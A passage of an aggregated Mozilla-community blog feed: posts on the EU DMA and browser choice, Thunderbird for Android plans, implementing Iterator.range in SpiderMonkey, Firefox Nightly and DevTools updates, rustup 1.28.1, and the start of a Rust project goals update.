The Mozilla BlogBrowser choice? Here’s how EU’s DMA is helping make it real

Too often, well-intentioned regulation misses the mark. This can be due to poor design, poor implementation, poor compliance, or failure to address unintended consequences. But the EU’s Digital Markets Act (DMA) has the potential to be different.

The DMA is a regulatory framework that came into effect in the EU in March 2024. It covers a range of services, including browsers, where it empowers people in the EU to choose a browser for themselves. 

Twelve months later, the verdict’s in, and it proves what 98% of people told us before the DMA even kicked in last year: People want browser choice. And when they are given real choice, they will opt for a browser that serves their needs and preferences. 

For many EU consumers, this choice has been Firefox — an independent browser that offers the features they want in terms of privacy, safety, productivity and speed.

Why is the DMA important?

The DMA is a first-of-its-kind regulation. Its aim? Leveling the playing field so that EU consumers can discover and use products from smaller, innovative companies without being blocked by gatekeeper operating systems. In practice? When it comes to browsers, it means putting real choice in the hands of users. The desired outcome? Removing barriers to choice such as the complex device settings consumers have to navigate to change their pre-installed browser — and enabling them to keep their choice. 

Under the DMA, certain operating system providers are required to prompt users to actively select their preferred default web browser through a choice screen.

What is a browser choice screen and when will I see one?

Browser choice screens are a seemingly simple solution — a menu of options listed for you to choose your preferred default browser. 

The first DMA browser choice screens started rolling out in the EU in March 2024. Since then, they have slowly started appearing for:

  • New and existing Android smartphones and tablet users with Chrome pre-set as a default browser (though rollout has been fairly inconsistent)
  • New and existing iOS users with Safari as their default browser, who have iOS 18.2 and iPadOS 18.2 or later iOS versions installed on their device (initial roll out in iOS 17.4 was poorly designed)

Unfortunately, if you’re a smartphone user outside the EU — or a Windows/Mac user anywhere — you won’t have seen the benefit of browser choice screens. Yet.  

Why does browser choice matter?

From our research, we know that when well-designed and fully implemented, browser choice screens can be a powerful tool. They can not only provide people with real choice but can also have a huge impact on their levels of satisfaction with their tech by giving them freedom to customize their device experience more easily and quickly. Just as important, browser choice screens can promote user choice without degrading the user experience or causing unintended harm to consumers, competition and innovation.

Browser choice screens also matter because they allow people to opt for independent alternatives like Firefox that are not tied to an operating system or device manufacturer. This makes them a critical intervention against the self-preferencing deployed by device manufacturers and operating systems, which push people to use their own label browsers and services. 

What happens when you choose for yourself?

Despite vague compliance plans and some obvious gatekeeper non-compliance preventing the DMA from reaching its full potential, one year on we’re starting to see how targeted regulation can help tackle some of the barriers to competition in the browser space and what can happen if the power of browser choice is in the hands of consumers. 

Since the launch of the first DMA browser choice screens on iOS in March 2024, people are making themselves heard: Firefox daily active users in Germany alone have increased by 99%. And in France, Firefox’s daily active users on iOS grew by 111%. 

This growth has also been fueled by a number of new features coming to Firefox — from enhanced privacy controls and performance updates to new productivity tools — but the effect of the DMA is clear. When people are given browser choice, they vote with their feet for a product they love and stick with it. 

And we’ve found that when people choose Firefox via a DMA choice screen, they stick with it. 

Why choose Firefox?

When Firefox was launched 20 years ago, our mission was to provide people with an alternative choice for a browser that prioritises user privacy, transparency and openness.  

The internet has changed dramatically since then, but our mission to keep the internet open and accessible to everyone is more important than ever. This is why we’re continuously improving Firefox and working on providing users with real choice, giving them control of their internet experience through privacy and productivity enhancing features. 

Not convinced yet? Don’t take our word for it and check out what users say they love about Firefox.

Ready to make the switch? Don’t wait on a choice screen, download Firefox or set it as your default browser now.

An illustration shows the Firefox logo, a fox curled up in a circle.

Get Firefox

Get the browser that protects what’s important

The post Browser choice? Here’s how EU’s DMA is helping make it real appeared first on The Mozilla Blog.

Mozilla ThunderbirdThunderbird for Android January/February 2025 Progress Report

Hello, everyone, and welcome to the first Android Progress Report of 2025. We’re ready to hit the ground running improving Thunderbird for Android experience for all of our users. Our January/February update involves a look at improvements to the account drawer and folders on our roadmap, an update on Google and K-9 Mail, and explores our first step towards Thunderbird on iOS.

Account Drawer Improvements

As we noted in our last post on the blog, improving the account drawer experience is one of our top priorities for development in 2025. We heard your feedback and want to make sure we provide an account drawer that lets you navigate between accounts easily and efficiently. Let’s briefly go into the most common feedback:

  • The accounts on the same domains or with similar names are difficult to distinguish from the two letters provided.
  • It isn’t clear how the account name influences the initials.
  • The icons seemed to be jumping around, especially obvious with 3–5 accounts.
  • There is a lot of spacing in the new drawer.
  • Users would like more customization options, such as an account picture or icon.
  • Some users would like to see a broader view that shows the whole account name.
  • With just one account, the accounts sidebar isn’t very useful.

Our design folks are working on some mockups on where the journey is taking us. We’re going to share them on the beta topicbox where you can provide more targeted feedback, but for a sneak peek here is a medium-fidelity mockup of what the new drawer and settings could look like:

On the technical side, we’ve integrated an image loader for the upcoming pictures. We now need to gradually adapt the mockups. We will begin with the settings screen changes and then adapt the drawer itself to follow.

Notifications and Error States

Some of you had the feeling your email was not arriving quick enough. While email delivery is reliable, there are a few settings in Thunderbird for Android and K-9 mail that aren’t obvious leading to confusion. When permissions are not granted, functionality is simply turned off instead of telling the user they actually need to grant the alarms permission for us to do a regular sync. Or maybe the sync interval is simply set to the default of 1 hour.

We’re still in the process of mapping out the best experience here, but will have more updates soon. See the notifications support article in case you are experiencing issues. A few things we’re aiming for this year:

  • Show an indicator in foreground service notification when push isn’t working for all configured folders
  • Show more detailed information when foreground service notification is tapped
  • Move most error messages from the system notifications to an area in-app to clearly identify when there is an error
  • Make authentication errors, certificate errors, and persistent connectivity issues use the new in-app mechanism
  • Make the folder synchronization settings more clear (ever wondered why there is “sync” and “push” and if you should have both enabled or not?)
  • Prompt for permissions when they are needed, such as aforementioned alarms permission
  • Indicate to the user if permissions are missing for their folder settings.
  • Better debug tool in case of notification issues.

Road(map) to the Highway

Our roadmap is currently under review from the Thunderbird council. Once we have their final approval, we’ll update the roadmap documentation. While we’re waiting, we would like to share some of the items we’ve proposed:

  • Listening to community feedback on Mozilla Connect and implementing HTML signatures and quick filter actions, similar to the Thunderbird Desktop
  • Backend refactoring work on the messages database to improve synchronization
  • Improving the message display so that you’ll see fewer prompts to download additional messages
  • Adding Android 15 compatibility, which is mainly Edge to Edge support
  • Improving the QR code import defaults (relates to notification settings as well)
  • Making better product decisions by (re-)introducing a limited amount of opt-in telemetry.

Does that sound exciting to you? Would you like to be a part of this but don’t feel you have the time? Are you good at writing Android apps in Kotlin and have an interest in muti-platform work? Well, do I have a treat for you! We’re hiring an Android Senior Software Engineer to work on Thunderbird for Android!

K-9 Mail Blocked from Gmail

We briefly touched on this in the last update as well: some of our users on K-9 Mail have noticed issues with an “App Blocked” error when trying to log into certain Gmail accounts. Google is asking K-9 Mail to go through a new verification process and has introduced some additional requirements that were not needed before. Users that are already logged in or have logged in recently should not be affected currently.

Meeting these requirements depended on several factors beyond our control, so we weren’t able to resolve this immediately.

If you are experiencing this issue on K-9 Mail, the quickest workaround is to migrate to Thunderbird for Android, or check out one of the other options on the support page. For those interested, more technical details can be found in issue 8598. We’re using keys on this application that have so far not been blocked. Our account import feature will make this transition pretty seamless. 

We’ve been able to make some major progress on this, we have a vendor for the required CASA review and expect the letter of validation to be shared soon. We’re still hitting a wall with Google, as they are giving us inconsistent information on the state of the review, and making some requirements on the privacy policy that sound more like they are intended for web apps. We’ve made an effort to clarify this further and hope that Google will accept our revised policy.

If all goes well we’ll get approval by the end of the month, and then need to make some changes to the key distribution so that Thunderbird and K-9 use the intended keys. 

Our Plans for Thunderbird on iOS

If you watched the Thunderbird Community Office Hours for January, you might have noticed us talking about iOS. You heard right – our plans for the Thunderbird iOS app are getting underway! We’ve been working on some basic architectural decisions and plan to publish a barebones repository on GitHub soon. You can expect a readme and some basic tools, but the real work will begin when we’ve hired a Senior Software Engineer who will lead development of a Thunderbird app for the iPhone and iPad. Interviews for some candidates have started and we wish them all the best!

With this upcoming hire, we plan to have alpha code available on Test Flight by the end of the year. To set expectations up front, functionality will be quite basic. A lof of work goes into writing an email application from scratch. We’re going to be focusing on a basic display of email messages, and then expanding to triage actions. Sending basic emails is also on our list.

FOSDEM

Our team recently attended FOSDEM in Brussels, Belgium. For those unfamiliar with FOSDEM, it’s the Free and Open Source Software Developers’ European Meeting—an event where many open-source enthusiasts come together to connect, share knowledge and ideas, and showcase the projects they’re passionate about.

We received a lot of valuable feedback from the community on Thunderbird for Android. Some key areas of feedback included the need for Exchange support, improvements to the folder drawer, performance enhancements, push notifications (and some confusion around their functionality), and much more.

Our team was highly engaged in listening to this feedback, and we will take all of it into account as we plan our future roadmap. Thunderbird has always been a project developed in tandem with our community and it was exciting for us to be at FOSDEM to connect with our users, contributors and friends.

In other news…

As always, you can join our Android-related mailing lists on TopicBox. And if you want to help us test new features, you can become a beta tester.

This blog post talks a lot about the exciting things we have planned for 2025. We’re also hiring for two positions, and may have a third one later in the year. While our software is free and open source, creating a world class email application isn’t without a cost. If you haven’t already made a contribution in January,  please consider supporting our work with a financial contribution. Thunderbird for Android relies entirely on user funding, so without your support we could likely only get to a fraction of what you see here. Making a contribution is really easy if you have Thunderbird for Android or K-9 Mail installed, just head over to the settings and sign up directly from your device. 

See you next month,

The post Thunderbird for Android January/February 2025 Progress Report appeared first on The Thunderbird Blog.

Spidermonkey Development BlogImplementing Iterator.range in SpiderMonkey

In October 2024, I joined Outreachy as an Open Source contributor and in December 2024, I joined Outreachy as an intern working with Mozilla. My role was to implement the TC39 Range Proposal in the SpiderMonkey JavaScript engine. Iterator.range is a new built-in method proposed for JavaScript iterators that allows generating a sequence of numbers within a specified range. It functions similarly to Python’s range, providing an easy and efficient way to iterate over a series of values:

for (const i of Iterator.range(0, 43)) console.log(i); // 0 to 42

But also things like:

function* even() {
  for (const i of Iterator.range(0, Infinity)) if (i % 2 === 0) yield i;
}

In this blog post, we will explore the implementation of Iterator.range in the SpiderMonkey JavaScript engine.

Understanding the Implementation

When I started working on Iterator.range, the initial implementation had been done, ie; adding a preference for the proposal and making the builtin accessible in the JavaScript shell.

The Iterator.range simply returned false, a stub indicating that the actual implementation of Iterator.range was under development or not fully implemented, which is where I came in. As a start, I created a CreateNumericRangeIterator function that delegates to the Iterator.range function. Following that, I implemented the first three steps within the Iterator.range function. Next, I initialised variables and parameters for the NUMBER-RANGE data type in the CreateNumericRangeIteratorfunction.

I focused on implementing sequences that increase by one, such as Iterator.range(0, 10).Next, I created an IteratorRangeGenerator* function (ie, step 18 of the Range proposal), that when called doesn’t execute immediately, but returns a generator object which follows the iterator protocol. Inside the generator function you have yield statements which represents where the function suspends its execution and provides value back to the caller. Additionaly, I updated the CreateNumericRangeIterator function to invoke IteratorRangeGenerator* with the appropriate arguments, aligning with Step 19 of the specification, and added tests to verify its functionality.

The generator will pause at each yield, and will not continue until the next method is called on the generator object that is created. The NumericRangeIteratorPrototype (Step 27.1.4.2 of the proposal) is the object that holds the iterator prototype for the Numeric range iterator. The next() method is added to the NumericRangeIteratorPrototype, when you call the next() method on an object created from NumericRangeIteratorPrototype, it doesn’t directly return a value, but it makes the generator yield the next value in the series, effectively resuming the suspended generator.

The first time you invoke next() on the generator object created via IteratorRangeGenerator*, the generator will run up to the first yield statement and return the first value. When you invoke next() again, theNumericRangeIteratorNext() will be called.

This method uses GeneratorResume(this), which means the generator will pick up right where it left off, continuing to iterate the next yield statement or until iteration ends.

Generator Alternative

After discussions with my mentors Daniel and Arai, I transitioned from a generator-based implementation to a more efficient slot-based approach. This change involved defining slots to store the state necessary for computing the next value. The reasons included:

  • Efficiency: Directly managing iteration state is faster than relying on generator functions.
  • Simplified Implementation: A slot-based approach eliminates the need for generator-specific handling, making the code more maintainable.
  • Better Alignment with Other Iterators: Existing built-in iterators such as StringIteratorPrototype and ArrayIteratorPrototype do not use generators in their implementations.

Perfomance and Benchmarks

To quantify the performance improvements gained by transitioning from a generator-based implementation to a slot-based approach, I conducted comparative benchmarks using a test in the current bookmarks/central, and in the revision that used generator-based approach. My benchmark tested two key scenarios:

  • Floating-point range iteration: Iterating through 100,000 numbers with a step of 0.1
  • BigInt range iteration: Iterating through 1,000,000 BigInts with a step of 2

Each test was run 100 times to eliminate anomalies. The benchmark code was structured as follows:

// Benchmark for Number iteration
var sum = 0;
for (var i = 0; i < 100; ++i) {
  for (num of Iterator.range(0, 100000, 0.1)) {
    sum += num;
  }
}
print(sum);

// Benchmark for BigInt iteration
var sum = 0n;
for (var i = 0; i < 100; ++i) {
  for (num of Iterator.range(0n, 1000000n, 2n)) {
    sum += num;
  }
}
print(sum);

Results

Implementation Execution Time (ms) Improvement
Generator-based 8,174.60 -
Slot-based 2,725.33 66.70%

The slot-based implementation completed the benchmark in just 2.7 seconds compared to 8.2 seconds for the generator-based approach. This represents a 66.7% reduction in execution time, or in other words, the optimized implementation is approximately 3 times faster.

Challenges

Implementing BigInt support was straightforward from a specification perspective, but I encountered two blockers:

1. Handling Infinity Checks Correctly

The specification ensures that start is either a Number or a BigInt in steps 3.a and 4.a. However, step 5 states:

  • If start is +∞ or -∞, throw a RangeError.

Despite following this, my implementation still threw an error stating that start must be finite. After investigating, I found that the issue stemmed from using a self-hosted isFinite function.

The specification requires isFinite to throw a TypeError for BigInt, but the self-hosted Number_isFinite returns false instead. This turned out to be more of an implementation issue than a specification issue.

See Github discussion here.

  • Fix: Explicitly check that start is a number before calling isFinite:
// Step 5: If start is +∞ or -∞, throw a RangeError.
if (typeof start === "number" && !Number_isFinite(start)) {
  ThrowRangeError(JSMSG_ITERATOR_RANGE_START_INFINITY);
}

2. Floating Point Precision Errors

When testing floating-point sequences, I encountered an issue where some decimal values were not represented exactly due to JavaScript’s floating-point precision limitations. This caused incorrect test results.

There’s a GitHub issue discussing this in depth. I implemented an approximatelyEqual function to compare values within a small margin of error.

  • Fix: Using approximatelyEqual in tests:
const resultFloat2 = Array.from(Iterator.range(0, 1, 0.2));
approximatelyEqual(resultFloat2, [0, 0.2, 0.4, 0.6, 0.8]);

This function ensures that minor precision errors do not cause test failures, improving floating-point range calculations.

Next Steps and Future Improvements

There are different stages a TC39 proposal goes through before it can be shipped. This document shows the different stages that a proposal goes through from ideation to consumption. The Iterator.range proposal is currently at stage 1 which is the Draft stage. Ideally, the proposal should advance to stage 3 which means that the specification is stable and no changes to the proposal are expected, but some necessary changes may still occur due to web incompatibilities or feedback from production-grade implementations.

Currently, this implementation is in it’s early stages of implementation. It’s only built in Nightly and disabled by default until such a time the proposal is in stage 3 or 4 and no further revision to the specification can be made.

Final Thoughts

Working on the Iterator.range implementation in SpiderMonkey has been a deeply rewarding experience. I learned how to navigate a large and complex codebase, collaborate with experienced engineers, and translate a formal specification into an optimized, real-world implementation. The transition from a generator-based approach to a slot-based one was a significant learning moment, reinforcing the importance of efficiency in JavaScript engine internals.

Beyond technical skills, I gained a deeper appreciation for the standardization process in JavaScript. The experience highlighted how proposals evolve through real-world feedback, and how early-stage implementations help shape their final form.

As Iterator.range continues its journey through the TC39 proposal stages, I look forward to seeing its adoption in JavaScript engines and the impact it will have on developers. I hope this post provides useful insights into SpiderMonkey development and encourages others to contribute to open-source projects and JavaScript standardization efforts.

If you’d like to read more, here are my blog posts that I made during the project:

Firefox NightlyHigh Profile Improvements – These Weeks in Firefox: Issue 176

Highlights

  • Multiple profiles are now enabled by default in Nightly!
  • For WebExtension authors, failed downloads with a NETWORK_FAILED error can now be resumed through the downloads WebExtensions API – Bug 1694049
    • Thanks to kernp25 for contributing a fix for this longstanding bug 🎉
  • Alexandre Poirot has enabled Service Worker debugging by default in the Firefox DevTools debugger
  • Moritz fixed a bug where users switching between Fx versions using the same profile were unable to search and saw broken context menus. This affected a small number of users in release, and so his patch landed in a dot release.

Friends of the Firefox team

Resolved bugs (excluding employees)

Volunteers that fixed more than one bug

  • kernp25

New contributors (🌟 = first patch)

Project Updates

Add-ons / Web Extensions

WebExtensions Framework
  • Tabs that have been redirected to a moz-extension urls (e.g. through webRequest or DNR) can now be reloaded or navigated back successfully to the moz-extension urls in the tab history – Bug 1826867
WebExtension APIs
  • Starting from Firefox 136 menus.update and menus.remove API methods will return a rejected promise instead of ignoring non-existing menus – Bug 1688743
  • Fixed bug in DNR `initiatorDomains` and `requestDomains` conditions – Bug 1939981
    • Thanks to Arkadiy Tetelman for reporting and contributing a fix for this bug 🎉

DevTools

  • Alexandre Poirot worked on several fixes for webextensions debugging:
    • Fixed a regression where webextensions creating iframes would lead to blank devtools (#1941006)
    • Fixed a bug where content scripts could appear duplicated in the source tree, and would also result in awkward behavior when pausing / stepping (#1941681)
    • Improved the handling of messages logged from content scripts to avoid duplicated log entries (#1941418)
    • Show manifest error when reloading an addon from DevTools (#1940079)
      • An error message appearing in the debugger for a WebExtension when the manifest cannot be loaded. The error reads: "Unable to reload: JSON.parse: expected double-quoted property name at line 3 column 3 of the JSON data from: server0.conn1.webExtensionDescriptor13 (resource://gre/modules/Extension.sys.mjs: 1176:26)"

        An error message is certainly better than silently failing in this case.

  • Nicolas Chevobbe fixed a few accessibility and High Contrast mode issues:
    • Fixed the color of the close button used in sourcemap warnings to be correct in dark mode (#1942227)
    • Updated the netmonitor status codes to be visible in High Contrast mode (#1940749)
  • Nicolas Chevobbe also made several improvements to autocompletes in DevTools:
    • The CSS autocomplete will now provide suggestions for variables when used inside calc, for instance in width: calc(var(– (#1444772)
    • The autocomplete in the inspector search is now handling correctly classnames containing numbers and special characters (#1220387)
  • Nicolas Chevobbe addressed a long standing issue in the JSON viewer which would always display values after parsing them via JS, which could result in approximate values for big numbers or high precision decimals. The source is now always displayed, and we also show the JS parsed value next to it when relevant. (#1431808)
    • The JSON Viewer developer tool showing two very large numeric values. They are shown exactly as they're defined in the JSON, and then right next to them is an indicator displaying the numeric value that they were parsed to.
  • Julian Descottes fixed a bug with the Debugger local script override which might incorrectly show scripts as being overridden if another DevTools Toolbox previously added an override (#1940998)
  • Julian Descottes addressed a regression which would lead to blank devtools if any iframe on the page was showing an XML document with an invalid XSLT (#1934520)
  • Julian Descottes fixed an issue with the Debugger pretty printing feature, which could fail if the file contained windows-style line-breaks (#1932023)
  • Julian Descottes finalized an old patch to show details about the throttling profiles you can select in the network monitor and RDM (#1770932)
    • The throttling menu for the Network Monitor developer tools is displayed, with each menu item indicating the approximate download and upload speed, as well as an indication of latency. For example: "GPRS (↓50Kbps ↑20Kbps ⏲ 500ms)"

      In case you need a reminder of what 2G speed is like.

  • Hubert Boma Manilla fixed a recent regression with the preview popup in the debugger which would not show the value of the hovered token (#1941269)
  • Hubert Boma Manilla improved the edit and resend feature in the netmonitor to properly set the security flags for the resent requests and avoid bugs for instance with requests using CORS (#1883380)

WebDriver BiDi

Lint, Docs and Workflow

  • Gijs enabled the eslint-plugin-promise rule for valid-params which checks for functions on Promise being called with the correct amount of arguments.
    • This will protect against cases such as foo.catch() which looks like it should do something, but doesn’t.
  • Standard8 added a linter for checking that we don’t include package names in unpublished package.json files.

New Tab Page

  • The New Tab layout update has rolled out to 100% of our US population! We’re aiming to do the rest of the world soon.

Search and Navigation

  • Address Bar
    • Mandy fixed a bug so that we now correctly handle a question mark appearing at the end of a search string (1648956)
    • James landed a patch related to urlbar interaction tracking that ends all interactions after one hour of inactivity (1936956)
    • Emilio fixed a bug where, when Firefox Translations was used for a page, the address bar wasn’t showing what language the page had been translated to (1938121)
    • Marco fixed a bug where the search open tabs feature wasn’t finding tabs where the page had loaded with a 4xx or 5xx server status error (1939597)
  • Scotch Bonnet
    • Yazan fixed an issue where search mode was defaulting to Google after the browser was restarted (1925235)
    • Daisuke fixed an issue where screenreaders were failing to narrate secondary actions buttons when in actions mode (1929515)
    • Daisuke also fixed an issue related to using ctrl+shift+tab to navigate to the previous tab (1933243)
    • Daisuke fixed an issue where the unified search button dropdown wasn’t being dismissed when a new tab was opened using ctrl+T (1936545)
    • Marco enabled the not secure label for http for Release 136 (1937136)
    • Dale fixed an issue so that the search keyword is retained for contextual search mode when the engine is autofilled (1938036)
    • Daisuke landed a patch so that contextual search works with multiple-word searches (1938040)
    • Moritz fixed a bug where the unified search button icon wasn’t being refreshed correctly in private browsing windows (1938567)

Storybook/Reusable Components

  • Hanna created the moz-input-text component Storybook
  • Tim created the moz-input-search component (more changes to come) Storybook
  • Anna added documentation for moz-button Storybook
  • Jules added support for description and support-page to the moz-radio-group (for the group itself, it was already there for individual radios) Storybook

Hanna added the moz-box-button component that will be used in the Settings redesign and some other settings throughout Firefox Storybook

Mozilla ThunderbirdThunderbird Release Channel Update

The monthly Release channel is ready to help you move from annual to monthly updates in Thunderbird. This update lets you know how to switch from the annual update (ESR) to monthly updates (Release), why you might have to wait, and what features you’ll get first!

How do I switch from annual to monthly updates (ESR to Release)?

Right now, you can switch to the Release channel through manual installs only from the Thunderbird website Downloads page.  Other installation sources will have the Release version in the future such as Windows Store,  3rd-party sites and various Linux packages such as Snap, Flatpak.  

First, back up your profile data, as you should always do before making major changes. And check that your computer meets the System Requirements for version 136.  Then go to the Downloads page of the website. If Release Channel does not show “Thunderbird Release” then correct it. Click the ‘Download’ button. For Windows and macOS, run the downloaded file to install the monthly release into the same directory where the ESR is currently installed. (If you have installed Thunderbird ESR into a directory that is different from the default location, then you must do a custom installation to that directory.)  For Linux, consult the Linux installation knowledge base (KB) article.  

What’s new in 136.0?

Now that you know how to make the switch, here’s some reasons to make the change. Here are some of the key features you’ll get as soon as you upgrade to the Release channel:

Improved Dark Reader

Enable dark reader for the message pane with `mail.dark-reader.enabled` preference

Improved Dark Mode

Messages are automatically adapted to dark mode with a quick toggle in the header

A Global Switch for Threading

New “Appearance” Settings UI to globally control message threading/sorting order

Filters in the Folder Pane

Message filters are now available in the Folder Pane context menu

Horizontal Threadpane Scrolling

Enable horizontal threadpane scrolling with `mail.threadpane.table.horizontal_scroll` preference

Improved Calendar Setup Wizard

Added checkbox to select/unselect all calendars in the calendar setup wizard

See all the changes in our Release Notes.

The post Thunderbird Release Channel Update appeared first on The Thunderbird Blog.

The Rust Programming Language BlogAnnouncing rustup 1.28.1

The rustup team is happy to announce the release of rustup version 1.28.1. Rustup is the recommended tool to install Rust, a programming language that is empowering everyone to build reliable and efficient software.

Challenges with rustup 1.28.0

rustup 1.28.0 was a significant release with many changes, and there was a quick response from many folks that this release broke their processes. While we considered yanking the release, we worried that this would cause problems for people who had already updated to adopt some of the changes. Instead, we are rolling forward with 1.28.1 today and potentially further bugfix releases to address the feedback that comes in.

We value all constructive feedback -- please keep it coming in the issue tracker. In particular, the change with regard to implicit toolchain installation is being discussed in this issue.

What's new in rustup 1.28.1

This release contains the following fixes:

How to update

If you have a previous version of rustup installed, getting rustup 1.28.1 is as easy as stopping any programs which may be using Rustup (e.g. closing your IDE) and running:

$ rustup self update

Rustup will also automatically update itself at the end of a normal toolchain update:

$ rustup update

If you don't have it already, you can get rustup from the appropriate page on our website.

Rustup's documentation is also available in the rustup book.

Caveats

Rustup releases can come with problems not caused by rustup itself but just due to having a new release. As such, we recommend paying attention to the following potential issues in particular:

These issues should be automatically resolved in a few weeks when the anti-malware scanners are updated to be aware of the new rustup release, and the hosted version is updated across all CI runners.

Thanks

Thanks to the rustup and t-release team members who came together to quickly address these issues.

Eitan IsaacsonNew Contrast Control Settings

What We Did

In today’s nightly build of Firefox we introduced a simple three-state toggle for color contrast.

Screenshot of radio group in Firefox settings

It allows you to choose between these options:

Automatic (use system settings)
Honor the system’s high contrast preferences in web content. If this is enabled, and say you are using a Windows High Contrast theme, the web content’s style will be overridden wherever needed to display text and links with the system’s colors.
Off
Regardless of the system’s settings the web content should be rendered as the content author intended. Colors will not be forced.
Custom
Always force user specified colors in web content. Colors for text and links foreground and background can be specified in the preferences UI.

Who Would Use This and How Would They Benefit?

There are many users with varying degrees of vision impairment that benefit from having control over the colors and intensity of the contrast between text and its background. We pride ourselves in Firefox for offering fine grained control to those who need it. We also try to do a good job anticipating the edge cases where forced high contrast might interfere with a user’s experience, for example we put a solid background backplate under text that is superimposed on top of an image.

But, the web is big and complex and there will always be cases where forced colors will not work. For example, take this Wordle puzzle: Wordle with default colors

The gold tiles indicate letters that are in the hidden word, and gold tiles represent letters that are in the word and in the right place in the word.

When a user is in forced colors mode, the background of the tiles disappears and the puzzle becomes unsolvable: Wordle with default colors

What More Can We Expect?

The work we did to add contrast control to the settings is a first step in allowing a user to quickly configure their web browser experience in order to adapt to their current uses. Just like text zoom, there is no one-size-fits-all. We will be working to allow users to easily adjust their color contrast settings as they are browsing and using the web.

Mozilla Addons BlogStyling your listing page on AMO with Markdown

The Mozilla Add-ons team is excited to announce that developers can now style content on addons.mozilla.org (AMO) using Markdown.

From the early days of AMO developers have been able to style parts of their add-ons’ listings using basic HTML tags like <b>, <code>, and <abbr>. This has been a great way for developers to emphasize information or add character to their listings. This feature has, unfortunately, also been a common source of mistakes. It’s not unusual to see HTML tags in listings due to closing tags, typos, or developers trying to use unsupported HTML elements.

To address this common source of errors and to better align with other tools that developers use, Mozilla has replaced AMO’s limited HTML support with a limited set of Markdown.

Our flavor of Markdown

AMO supports about a dozen Markdown rules: bold, italic, monospace, links, abbreviations, code blocks, blockquotes, ordered lists, and unordered lists. HTML is not supported. The full list of supported syntax and examples can be found in our documentation.

Currently, Markdown can be used in four areas: an add-on’s description, a custom license, custom privacy policy, and in review replies posted by the developer.

As before, links are automatically replaced by a version that is routed through AMO’s link bouncer.

How this change affects HTML content

AMO’s Markdown does not support HTML content. As a result, any HTML entered in a field that supports Markdown will display as plain text.

This change is not retroactive. Any content authored while HTML was supported will continue to display as originally intended. Only content updated after Markdown support was added will be treated as Markdown.

The post Styling your listing page on AMO with Markdown appeared first on Mozilla Add-ons Community Blog.

Jan-Erik RedigerSeven-year Moziversary

In March 2018 I started a job as a Telemetry engineer at Mozilla. Seven years later I'm still here on my Moziversary, as I was in 2019, 2020, 2021, 2022, 2023 and 2024.

Mozilla is not the same company it was when I joined. No one on the C-level is here for as long as I am. There have been 5 larger reorgs in the past year and two layoffs in different departments, plus the big round of layoffs at the Mozilla Foundation. My part of the organization was moved around again and for the moment Data Engineering is nested under the Infrastructure Org. Good colleagues left or were laid off. Just recently my team shrunk again. Notably I haven't posted anything under the mozilla tag since 2022, other than my Moziversary blog posts.

All-Hands MozWeek1 Dublin happened. The next one will be in Washington, D.C. Probably one of the worst choices given the state of the USA right now, and I might just skip it. I do hope for a team work week, but that's not decided yet.

The one constant over the past years is my work on Glean, which hasn't stopped. We're finally putting dedicated effort to move legacy telemetry in Firefox Desktop over to Glean (Are we Glean yet?). But still Glean isn't where I'd like it to be. Some of the early decisions in its design are coming back to bite us, the codebase grew significantly and could use a bit of cleanup, we never got the time to work on performance and memory improvements and our chosen local data storage desperately needs an update. Some of that was on my list last year already. If only there were less distractions that pull me of this work again and again. It's on my list of goals again this year, so maybe it works out better this time.

But other than that I don't know where Mozilla will be a year from now. It's going to be a challenging year.

Thank you

I'm in this job for seven years not only because I like the tech I get to work on, but also because my colleagues make it a delight to come back to work every day. Thanks to Alessio, Chris, Travis and Abhishek for being the Data Collection Tools team. Also thanks to Bruno, who was part of the team until recently. There's countless other people at Mozilla, inside Data Engineering but also across other parts of the organization, that I got to connect, chat and work with. Thank you!


Footnotes:

1

Change everywhere. Those Mozilla work weeks were renamed by Marketing.

The Rust Programming Language BlogFebruary Project Goals Update

This is the first Project Goals update for the new 2025h1 period. For the first 6 months of 2025, the Rust project will work towards a slate of 39 project goals, with 3 of them designed as Flagship Goals. This post provides selected updates on our progress towards these goals (or, in some cases, lack thereof). The full details for any particular goal are available in its associated tracking issue on the rust-project-goals repository.

Flagship goals

Why this goal? This work continues our drive to improve support for async programming in Rust. In 2024H2 we stabilized async closures; explored the generator design space; and began work on the dynosaur crate, an experimental proc-macro to provide dynamic dispatch for async functions in traits. In 2025H1 our plan is to deliver (1) improved support for async-fn-in-traits, completely subsuming the functionality of the async-trait crate; (2) progress towards sync and async generators, simplifying the creation of iterators and async data streams; (3) and improve the ergonomics of Pin, making lower-level async coding more approachable. These items together start to unblock the creation of the next generation of async libraries in the wider ecosystem, as progress there has been blocked on a stable solution for async traits and streams.

What has happened? The biggest news is that Rust 1.85 is stable and includes two major features that impact Async Rust. The first is async closures, which has been on many people's wish lists for a long time and was expertly moved forward by @compiler-errors over the last year.

The second feature included in 1.85 is the new lifetime capture rules as part of Rust 2024 edition. This should substantially improve the experience of using async Rust anytime a user writes -> impl Future, as it removes the need for + '_ or similar bounds in most cases. It will also lead to an easier to understand language, since those bounds only worked by exploiting the more subtle rules of impl Trait in a way that runs contrary to their actual semantic role in the language. In the 2024 Edition, the subtle rule is gone and we capture all input lifetimes by default, with the ability to use + use<> syntax to opt out. See this blog post for more.

Generators. The lang team also held a design meeting to review the design for generators, with the outcome of the last one being that we will implement a std::iter::iter! macro (exact path TBD) in the compiler, as a lang team experiment that allows the use of the yield syntax. We decided to go in this direction because we want to reserve gen for self-borrowing and perhaps lending generators, and aren't yet decided on which subset of features to expose under that syntax. This decision interacts with ongoing compiler development that isn't ready yet to enable experimentation with lending.

Our hope is that in the meantime, by shipping iter! we will give people the chance to start using generators in their own code and better understand which limitations people hit in practice.

As you may have noticed, I'm not talking about async generators here. Those are the ultimate goal for the async initiative, but we felt the first step should be clarifying the state of synchronous generators so we can build on that when talking about async ones.

Dynosaur. dynosaur v0.1.3 was released, with another release in the works. We think we are approaching a 1.0 release real soon now (tm). At this point you should be able to try it on your crate to enable dyn dispatch for traits with async fn and other -> impl Trait methods. If you need to use it together with #[trait_variant], you may need to wait until the next release when #55 is fixed.

1 detailed update available.

Comment by @tmandry posted on 2025-02-26:

Rust 1.85

The first update is the release of Rust 1.85, which had at least two major features that impact Async Rust. The first is async closures, which has been on many people's wish lists for a long time and was expertly moved forward by @compiler-errors over the last year.

The second is the new lifetime capture rules as part of Rust 2024 edition. This should substantially improve the experience of using async Rust anytime a user writes -> impl Future, as it removes the need for + '_ or similar bounds in most cases. It will also lead to an easier to understand language, since those bounds only worked by exploiting the more subtle rules of impl Trait in a way that runs contrary to their actual semantic role in the language. In the 2024 Edition, the subtle rule is gone and we capture all input lifetimes by default, with the ability to use + use<> syntax to opt out. See this blog post for more.

Generators

